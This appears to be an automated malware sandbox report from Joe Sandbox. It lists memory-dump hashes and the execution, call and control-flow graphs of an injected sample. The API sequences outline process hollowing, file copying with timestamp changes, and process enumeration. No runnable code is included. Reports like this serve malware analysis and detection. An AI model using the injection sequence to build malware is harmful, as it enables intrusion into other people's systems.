                                                                                                                          • Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                                                                                                                          • Instruction ID: 863a443b315763638c31dffea77139fa9fc7248c2f9879795720f54bbf800da4
                                                                                                                          • Opcode Fuzzy Hash: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                                                                                                                          • Instruction Fuzzy Hash: 4F115C2020C941ADD321D37CCA08914BFA59B4F72075802FBD6915A0C6CA79454AEF97
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                                                                                                                          • Instruction ID: 0c8bb5551e2abd97a64ae9c19d193427848800bdc9eaee9e975189e24a5225cd
                                                                                                                          • Opcode Fuzzy Hash: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                                                                                                                          • Instruction Fuzzy Hash: 56112C2020C581EDD321D27CCA09514BF959B4F72475801FBD691690C6DA79454AEB9B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                                                                                                                          • Instruction ID: f976abf0b506ce6ff8f37bbd7c8af7624669eab2ab4b5b0fb9c0d747e7254d45
                                                                                                                          • Opcode Fuzzy Hash: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                                                                                                                          • Instruction Fuzzy Hash: 1601472124C991BCE331E33CC908904BFE69B4FB6475802FAD2A15A0C7DA214589DFE7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                                                                                                                          • Instruction ID: c5c43ab6752ee8d18fcb74b59ff98ad39f6596117cd62c5b2c77ced72334e6aa
                                                                                                                          • Opcode Fuzzy Hash: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                                                                                                                          • Instruction Fuzzy Hash: B111E2321002609FDF21AF24C49569AFBB2FF4530C375A188C9969B111E722AD8FCB91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 79cd9034bfff8985795d7f01a2b5bacfc6e9aaff332886851db4d16c3fecaafc
                                                                                                                          • Instruction ID: 20a1f56e34deb81daffe23ddf7f3a634b4938193a6ef7f98b4fa68dc7b801d93
                                                                                                                          • Opcode Fuzzy Hash: 79cd9034bfff8985795d7f01a2b5bacfc6e9aaff332886851db4d16c3fecaafc
                                                                                                                          • Instruction Fuzzy Hash: 09F078B2A04347EBD715AAF482844AEBB20A740731BA4265BD5E6E62E1D779C504D704
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                                                                                                                          • Instruction ID: c48700b05c06e988df87cd580ca5e4308363d13747befdac9a33251d9afddee9
                                                                                                                          • Opcode Fuzzy Hash: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                                                                                                                          • Instruction Fuzzy Hash: 8EF0227101036187CF18AB389498198BBA1EE46668798079EDDA2770D2E327A4A9CB90

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:59.3%
                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                          Signature Coverage:10.6%
                                                                                                                          Total number of Nodes:142
                                                                                                                          Total number of Limit Nodes:6
                                                                                                                          execution_graph 1134 2491952 1137 2491980 1134->1137 1147 24919d0 1137->1147 1140 2491973 1141 249199b SleepEx 1141->1141 1142 24919ab 1141->1142 1153 24921c4 1142->1153 1148 2491a07 1147->1148 1149 2491ad0 RtlCreateHeap 1148->1149 1152 2491992 1148->1152 1150 2491b01 1149->1150 1151 2491c80 CreateThread CloseHandle CreateThread 1150->1151 1150->1152 1151->1152 1171 2493cd0 1151->1171 1174 2493bf4 1151->1174 1152->1140 1152->1141 1154 24921e2 1153->1154 1182 2494a40 1154->1182 1156 24919c0 1157 2491d8c 1156->1157 1188 2494c90 1157->1188 1159 2491dc7 1160 2491df8 CreateMutexExA 1159->1160 1161 2491e12 1160->1161 1192 2494e00 1161->1192 1163 2491e51 1197 2491f04 1163->1197 1168 2491ebe 1169 2491ee9 SleepEx 1168->1169 1209 249226c 1168->1209 1215 2492cd0 1168->1215 1169->1168 1169->1169 1172 2493ce2 EnumWindows SleepEx 1171->1172 1173 2493d06 1171->1173 1172->1172 1172->1173 1175 2493cab 1174->1175 1176 2493c11 CreateToolhelp32Snapshot 1174->1176 1177 2493c93 SleepEx 1176->1177 1178 2493c25 Process32First 1176->1178 1177->1175 1177->1176 1180 2493c3d 1178->1180 1179 2493c8a CloseHandle 1179->1177 1180->1179 1181 2493c78 Process32Next 1180->1181 1181->1180 1183 2494a69 1182->1183 1184 2494a7d GetTokenInformation 1183->1184 1187 2494ada 1183->1187 1185 2494aa8 1184->1185 1186 2494ab2 GetTokenInformation 1185->1186 1186->1187 1187->1156 1189 2494cbd GetVolumeInformationA 1188->1189 1191 2494d10 1189->1191 1191->1159 1193 2494e22 1192->1193 1195 2494e63 RegQueryValueExA 1193->1195 1196 2494eb6 1193->1196 1194 2494ede ObtainUserAgentString 1194->1163 1195->1193 1196->1194 1198 2491f27 1197->1198 1199 2491e7d CreateFileMappingA 1198->1199 1200 249203e 1198->1200 1201 2491f8b DeleteFileW CopyFileW 1198->1201 1199->1168 1223 2493490 1200->1223 1201->1199 1202 2491fab DeleteFileW 1201->1202 1205 2491fc1 1202->1205 1204 249205b CreateFileW 1204->1199 1206 2491ff6 DeleteFileW 1205->1206 1207 249200a 1206->1207 1229 2494920 1207->1229 1210 249229d 1209->1210 1236 24932ec CreateFileW 1210->1236 1212 24922b2 1240 249230c 1212->1240 1214 24922c3 1214->1168 1216 24932ec 2 API calls 1215->1216 1221 2492cf3 1216->1221 1217 2492f55 1217->1168 1218 2492f34 SleepEx 1218->1217 1218->1221 1221->1217 1221->1218 1222 2492efa ResumeThread 1221->1222 1278 2494578 1221->1278 1282 2492fac 1221->1282 1222->1221 1224 24934b1 1223->1224 1225 24934d1 GetUserNameW 1224->1225 1226 24934f2 1225->1226 1234 24935e8 CoCreateInstance 1226->1234 1228 249350d 1228->1204 1230 2494947 1229->1230 1231 2494967 SetFileAttributesW CreateFileW 1230->1231 1232 24949b2 SetFileTime 1231->1232 1233 24949d3 1232->1233 1233->1200 1235 2493646 1234->1235 1237 2493341 1236->1237 1239 249338f 1236->1239 1238 2493360 ReadFile 1237->1238 1237->1239 1238->1239 1239->1212 1264 2493de0 1240->1264 1242 24926b8 1242->1214 1243 2492594 1244 24925b8 1243->1244 1245 249279d 1243->1245 1247 24926f9 1244->1247 1248 24925d0 1244->1248 1255 2492657 1244->1255 1246 2493de0 RtlReAllocateHeap 1245->1246 1252 24927c4 1246->1252 1250 2493de0 RtlReAllocateHeap 1247->1250 1248->1242 1248->1255 1257 2493de0 RtlReAllocateHeap 1248->1257 1268 2492840 1248->1268 1249 249235f 1249->1242 1249->1243 1253 24924df DeleteFileW CreateFileW 1249->1253 1251 2492720 1250->1251 1251->1242 1258 2492840 RtlReAllocateHeap 1251->1258 1252->1242 1254 2492840 RtlReAllocateHeap 1252->1254 1253->1243 1256 2492522 1253->1256 1254->1242 1255->1242 1259 2493de0 RtlReAllocateHeap 1255->1259 1260 249255b WriteFile 1256->1260 1257->1248 1258->1242 1259->1242 1262 2492582 1260->1262 1263 2494920 3 API calls 1262->1263 1263->1243 1265 2493e0f 1264->1265 1274 2493f7c 1265->1274 1267 2493f2f 1267->1249 1269 2492849 1268->1269 1271 2492c63 1268->1271 1270 2493f7c RtlReAllocateHeap 1269->1270 1273 2492948 1269->1273 1270->1273 1271->1248 1272 2493de0 RtlReAllocateHeap 1272->1271 1273->1271 1273->1272 1276 2493fc6 1274->1276 1277 2493fbf 1274->1277 1275 24942af RtlReAllocateHeap 1275->1276 1276->1275 1276->1277 1279 24945a8 1278->1279 1280 249461c CreateProcessInternalW 1279->1280 1281 249466f 1280->1281 1281->1221 1283 2492fe3 1282->1283 1284 24932ae 1283->1284 1301 2494760 1283->1301 1287 2494760 NtCreateSection 1288 249305b 1287->1288 1288->1284 1289 2494760 NtCreateSection 1288->1289 1290 249308a 1289->1290 1291 2494760 NtCreateSection 1290->1291 1292 24930da 1291->1292 1293 24931b8 NtQueryInformationProcess 1292->1293 1294 2493198 NtQueryInformationProcess 1292->1294 1295 24931df 1293->1295 1294->1295 1295->1284 1296 24931e7 ReadProcessMemory 1295->1296 1305 2495328 1296->1305 1298 2493212 ReadProcessMemory 1299 2493236 1298->1299 1300 249329f WriteProcessMemory 1299->1300 1300->1284 1302 2494793 1301->1302 1304 249302b 1301->1304 1303 24947b1 NtCreateSection 1302->1303 1302->1304 1303->1304 1304->1287

                                                                                                                          Callgraph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          • Opacity -> Relevance
                                                                                                                          • Disassembly available
                                                                                                                          callgraph 0 Function_02495348 1 Function_02494FC8 2 Function_024952CC 3 Function_0249354C 3->2 47 Function_02494F1C 3->47 54 Function_02495328 3->54 4 Function_02494A40 4->2 9 Function_024953D8 4->9 4->54 5 Function_024943C0 46 Function_02495384 5->46 5->54 6 Function_02492840 6->0 6->1 6->2 10 Function_024950DC 6->10 11 Function_024939DC 6->11 24 Function_02493DE0 6->24 29 Function_02493F7C 6->29 6->47 6->54 7 Function_02491045 8 Function_024921C4 8->4 11->0 52 Function_02493A94 11->52 12 Function_024919D0 12->2 13 Function_02493CD0 12->13 33 Function_02493BF4 12->33 37 Function_02491D08 12->37 12->47 48 Function_02494B1C 12->48 14 Function_02492CD0 14->1 14->2 20 Function_024932EC 14->20 28 Function_02494578 14->28 40 Function_02494D8C 14->40 14->54 55 Function_02492FAC 14->55 15 Function_02491952 43 Function_02491980 15->43 16 Function_024911D4 36 Function_024913F4 16->36 17 Function_02491456 18 Function_024935E8 18->2 18->47 19 Function_02495368 20->1 20->2 20->47 20->54 21 Function_024917EC 22 Function_0249226C 22->2 22->20 38 Function_0249230C 22->38 23 Function_02494760 23->9 24->2 24->29 24->46 24->54 62 Function_024948B0 24->62 25 Function_02494860 26 Function_02491062 27 Function_02494BE4 28->2 28->47 28->54 29->1 29->2 29->5 29->19 35 Function_02495274 29->35 29->46 29->47 29->54 63 Function_02494434 29->63 30 Function_0249177C 31 Function_024949FC 32 Function_02491175 51 Function_02494714 33->51 60 Function_024950B0 33->60 34 Function_02495174 37->48 38->0 38->1 38->2 38->6 38->10 38->19 38->24 38->47 56 Function_02494920 38->56 57 Function_024946A0 38->57 39 Function_02491D8C 39->2 39->14 39->22 39->35 42 Function_02494E00 39->42 45 Function_02491F04 39->45 39->47 49 Function_02494C90 39->49 39->54 61 Function_024953B0 39->61 40->1 40->54 41 Function_02491501 42->2 42->10 42->47 43->8 43->12 43->39 44 Function_02491803 45->2 45->40 45->47 50 Function_02493490 45->50 45->54 45->56 47->1 47->54 48->27 48->60 49->2 49->34 49->47 49->54 50->2 50->3 50->18 50->54 53 Function_02496229 55->1 55->2 55->23 55->25 55->52 55->54 56->2 56->54 57->51 58 Function_02493D20 58->9 58->51 58->60 59 Function_02491938 62->46

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02494760: NtCreateSection.NTDLL ref: 024947D2
                                                                                                                          • NtQueryInformationProcess.NTDLL ref: 024931A2
                                                                                                                          • NtQueryInformationProcess.NTDLL ref: 024931CA
                                                                                                                          • ReadProcessMemory.KERNEL32 ref: 024931FD
                                                                                                                          • ReadProcessMemory.KERNEL32 ref: 0249322B
                                                                                                                          • WriteProcessMemory.KERNEL32 ref: 024932A8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_2491000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$Memory$InformationQueryRead$CreateSectionWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1349948393-0
                                                                                                                          • Opcode ID: 45eb5f97849bc5aafbf8ae00a7cc210e00dda27831372b457ac5c7141c8219ad
                                                                                                                          • Instruction ID: fe501c5e88438140bc53dcea084013a7de331407b212fbfbfb255ca244e1cb53
                                                                                                                          • Opcode Fuzzy Hash: 45eb5f97849bc5aafbf8ae00a7cc210e00dda27831372b457ac5c7141c8219ad
                                                                                                                          • Instruction Fuzzy Hash: 49B18031A18A4C8FDB58EF68D4456A9B7F2FB98310F10427ED84AE7255DB30E9068BC5

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 142 2493bf4-2493c0b 143 2493cab-2493cc4 142->143 144 2493c11-2493c23 CreateToolhelp32Snapshot 142->144 145 2493c93-2493ca5 SleepEx 144->145 146 2493c25-2493c3b Process32First 144->146 145->143 145->144 147 2493c86-2493c88 146->147 148 2493c8a-2493c8d CloseHandle 147->148 149 2493c3d-2493c54 call 24950b0 147->149 148->145 152 2493c56-2493c58 149->152 153 2493c5a-2493c68 152->153 154 2493c6c-2493c73 call 2494714 152->154 153->152 155 2493c6a 153->155 157 2493c78-2493c80 Process32Next 154->157 155->157 157->147
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_2491000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2482764027-0
                                                                                                                          • Opcode ID: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
                                                                                                                          • Instruction ID: c3e73344199daf2a68060841e52e793276c4b441605960dd908af421b78e8cd1
                                                                                                                          • Opcode Fuzzy Hash: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
                                                                                                                          • Instruction Fuzzy Hash: A221A531118A088FDF14EF64C4887AA7AE2FB89319F1406BFD44BDA255DB349585C751

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 264 2494760-249478d 265 249483b-249483c 264->265 266 2494793-24947ab call 24953d8 264->266 267 249483e-2494857 265->267 270 24947b1-24947db NtCreateSection 266->270 271 2494832-2494835 266->271 274 24947dd-24947df 270->274 275 2494825-2494827 270->275 272 2494829-2494830 271->272 273 2494837-2494838 271->273 276 24947e7-249481d 272->276 273->265 274->273 277 24947e1-24947e5 274->277 275->272 275->273 276->273 279 249481f-2494823 276->279 277->276 279->267
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_2491000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateSection
                                                                                                                          • String ID: @$@
                                                                                                                          • API String ID: 2449625523-149943524
                                                                                                                          • Opcode ID: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
                                                                                                                          • Instruction ID: 313dd531fb39fa4983e8aa12194a31cda554dca7a7e464d6f7543a13eadb5e4d
                                                                                                                          • Opcode Fuzzy Hash: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
                                                                                                                          • Instruction Fuzzy Hash: 07316D74908B898FCF94EF58C88866ABBE4FB58305F10066FE85DE3251DB70D841CB81

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 535 24935e8-2493640 CoCreateInstance 536 24939b7-24939d3 535->536 537 2493646-249369a 535->537 539 24939ac-24939b2 537->539 540 24936a0-24936bd 537->540 539->536 540->539 542 24936c3-24936df 540->542 544 24939a1-24939a7 542->544 545 24936e5-24936fb 542->545 544->539 545->544 547 2493701-2493770 545->547 555 2493994-249399c 547->555 556 2493776-249378c 547->556 555->544 558 2493839-249385f 556->558 559 2493792-24937ac 556->559 564 249389e-24938ef 558->564 565 2493861-2493880 558->565 559->558 562 24937b2-2493834 call 2494f1c * 2 call 24952cc * 2 559->562 562->558 582 249397f-249398f 564->582 583 24938f5-2493973 564->583 565->564 571 2493882-249388b 565->571 574 2493893-2493899 571->574 574->564 582->555 583->582
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_2491000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateInstance
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 542301482-0
                                                                                                                          • Opcode ID: e7b8fa26b1a46e4451f164796a8aa0d70886c8553f4a6f570b2b5b6e62293461
                                                                                                                          • Instruction ID: 9f941e53f8e3507980b79213038421e034518e00ae9962c6d6c22fc90ddd970c
                                                                                                                          • Opcode Fuzzy Hash: e7b8fa26b1a46e4451f164796a8aa0d70886c8553f4a6f570b2b5b6e62293461
                                                                                                                          • Instruction Fuzzy Hash: 96E1D934608A488FCF94EF28C895F9AB7F1FFA9305F114699E44ACB265DB70E944CB41
                                                                                                                          APIs
                                                                                                                          • GetUserNameW.ADVAPI32 ref: 024934E4
                                                                                                                            • Part of subcall function 024935E8: CoCreateInstance.COMBASE ref: 02493635
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_2491000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateInstanceNameUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3213660374-0
                                                                                                                          • Opcode ID: 81035dc135677410a02395aba5b8c5453cb28373790a056210d4eb3fa598bf54
                                                                                                                          • Instruction ID: 13d80858990948ed281db0544b3ac3ee8bfe2e059a4aa3027de295373e09ca02
                                                                                                                          • Opcode Fuzzy Hash: 81035dc135677410a02395aba5b8c5453cb28373790a056210d4eb3fa598bf54
                                                                                                                          • Instruction Fuzzy Hash: A211DA30718B4C4FCFA4EF69905875EBAE2FBDC310F904A6E984DC7255DA7489458B81

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_2491000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Create$Thread$CloseHandleHeap
                                                                                                                          • String ID: %g?$iP+
                                                                                                                          • API String ID: 371905858-765743493
                                                                                                                          • Opcode ID: ecbd1e2d1eb921e9ea06e1ae0500806f7f4f0c51e5794f8bcf7d88cb65ea9a7b
                                                                                                                          • Instruction ID: 01ec4afefe41f26f3a2a125acb3dac21ee17e1ab2328b38d6da8b981e4dd5d7b
                                                                                                                          • Opcode Fuzzy Hash: ecbd1e2d1eb921e9ea06e1ae0500806f7f4f0c51e5794f8bcf7d88cb65ea9a7b
                                                                                                                          • Instruction Fuzzy Hash: E591C630618A0A8FDF54EF19D891AA577D6FB98300B48017EDC4ECB256DB34E942DB92

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • DeleteFileW.KERNEL32 ref: 02491F8E
                                                                                                                          • CopyFileW.KERNEL32 ref: 02491F9D
                                                                                                                          • DeleteFileW.KERNEL32 ref: 02491FAE
                                                                                                                          • DeleteFileW.KERNEL32 ref: 02491FF9
                                                                                                                            • Part of subcall function 02494920: SetFileAttributesW.KERNEL32 ref: 0249496F
                                                                                                                            • Part of subcall function 02494920: CreateFileW.KERNEL32 ref: 02494999
                                                                                                                            • Part of subcall function 02494920: SetFileTime.KERNEL32 ref: 024949C4
                                                                                                                          • CreateFileW.KERNEL32 ref: 02492085
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_2491000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Delete$Create$AttributesCopyTime
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 642576546-0
                                                                                                                          • Opcode ID: e9731c391335859cd68f5fed700ca15d06b8495037da1be80876dbaa4d1617e7
                                                                                                                          • Instruction ID: 1240213fdb7e289e3f5dc1aba836ae925e0acd94e6c5441314baaedffa3277a9
                                                                                                                          • Opcode Fuzzy Hash: e9731c391335859cd68f5fed700ca15d06b8495037da1be80876dbaa4d1617e7
                                                                                                                          • Instruction Fuzzy Hash: 6D414A30718A4C4FCFA8AFAD945876E7AD2EB8C310F50457EA90EC7385DE749D068B81

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 158 249230c-2492369 call 2493de0 161 249236f-2492374 158->161 162 2492817 158->162 161->162 163 249237a-249237d 161->163 164 249281d-2492837 162->164 163->162 165 2492383-249238e 163->165 166 2492394-24923c7 call 2494fc8 165->166 167 2492807-249280d call 2495348 165->167 166->167 173 24923cd-24923f2 call 2494f1c call 24950dc 166->173 171 2492812-2492815 167->171 171->162 171->164 178 249241d 173->178 179 24923f4-249240e 173->179 180 2492422-249243b call 24950dc 178->180 179->178 183 2492410-249241b 179->183 185 24925aa-24925b2 180->185 186 2492441-2492454 180->186 183->180 187 24925b8-24925bc 185->187 188 249279d-24927ca call 2493de0 185->188 189 24924a6-24924a8 186->189 190 2492456-249249d 186->190 192 24925c2-24925ca 187->192 193 2492664-24926f4 call 24946a0 call 2493444 call 2493de0 call 2495348 187->193 204 24927cc-24927d3 188->204 205 24927ff-2492805 188->205 189->185 191 24924ae-2492520 call 2495368 DeleteFileW CreateFileW 189->191 190->189 216 249259f-24925a5 call 2495348 191->216 217 2492522-2492579 call 2494f1c call 2494fc8 WriteFile 191->217 196 24926f9-2492726 call 2493de0 192->196 197 24925d0-24925dd 192->197 193->167 196->205 214 249272c-2492733 196->214 197->205 212 24925e3-24925e6 197->212 204->205 209 24927d5-24927d8 204->209 205->167 209->205 210 24927da-24927fa call 2492840 call 2495348 209->210 210->205 212->205 218 24925ec-24925f0 212->218 214->205 219 2492739-249273c 214->219 216->185 253 2492582-249259a call 2494920 call 24952cc 217->253 224 24925f2-249261f call 2493de0 218->224 225 2492657-249265e 218->225 219->205 227 2492742-249279b call 2492840 call 24946a0 call 2495348 219->227 238 2492651-2492655 224->238 239 2492621-2492628 224->239 225->193 225->205 227->205 238->224 238->225 239->238 244 249262a-249262d 239->244 244->238 245 249262f-249264c call 2492840 call 2495348 244->245 245->238 253->216
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_2491000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CreateDeleteWrite
                                                                                                                          • String ID: |:|
                                                                                                                          • API String ID: 2199199414-3736120136
                                                                                                                          • Opcode ID: 9040bef6d448ccb6289fd7aa145a130caf9b4baa9b6cb73fa6352a9bf28ca752
                                                                                                                          • Instruction ID: 04959b91772042729cdd83233fda7618489f391c6a20bf147c0088bc47460b0e
                                                                                                                          • Opcode Fuzzy Hash: 9040bef6d448ccb6289fd7aa145a130caf9b4baa9b6cb73fa6352a9bf28ca752
                                                                                                                          • Instruction Fuzzy Hash: D1E18730718F484BDB69EB6884597AA7BD1FB98315F10062FD89FC3281DF74E9428786

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02494C90: GetVolumeInformationA.KERNEL32 ref: 02494CFD
                                                                                                                          • CreateMutexExA.KERNEL32 ref: 02491DFF
                                                                                                                          • CreateFileMappingA.KERNEL32 ref: 02491EB1
                                                                                                                          • SleepEx.KERNEL32 ref: 02491EEE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_2491000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Create$FileInformationMappingMutexSleepVolume
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3744091137-0
                                                                                                                          • Opcode ID: 7aa97a72d667d6e7631d82889301dab56f55e5304ad79d64984249ffe4174cbc
                                                                                                                          • Instruction ID: bb35f8775d6ed041ba4bec9243b89a1ceeee63f660d358e5f50f8a9f933d9727
                                                                                                                          • Opcode Fuzzy Hash: 7aa97a72d667d6e7631d82889301dab56f55e5304ad79d64984249ffe4174cbc
                                                                                                                          • Instruction Fuzzy Hash: D4415E30714F088FDF65EB7980587AA7AD2EB98306F504A2E905ED6240CFB496029B81

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_2491000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesCreateTime
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1986686026-0
                                                                                                                          • Opcode ID: 74ea676ed02ce2377571a80dead8b1a094930347c2c6fc5d14f4583f9d63d04d
                                                                                                                          • Instruction ID: f1ba2a4baa26ef986fd424a71ab431113f3ac9eac0ead6f34776c4933b90440d
                                                                                                                          • Opcode Fuzzy Hash: 74ea676ed02ce2377571a80dead8b1a094930347c2c6fc5d14f4583f9d63d04d
                                                                                                                          • Instruction Fuzzy Hash: 2B21333070CB488FDF64EF68948879E76E2FBDC701F10456EA84EC7245DA34DA058782

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
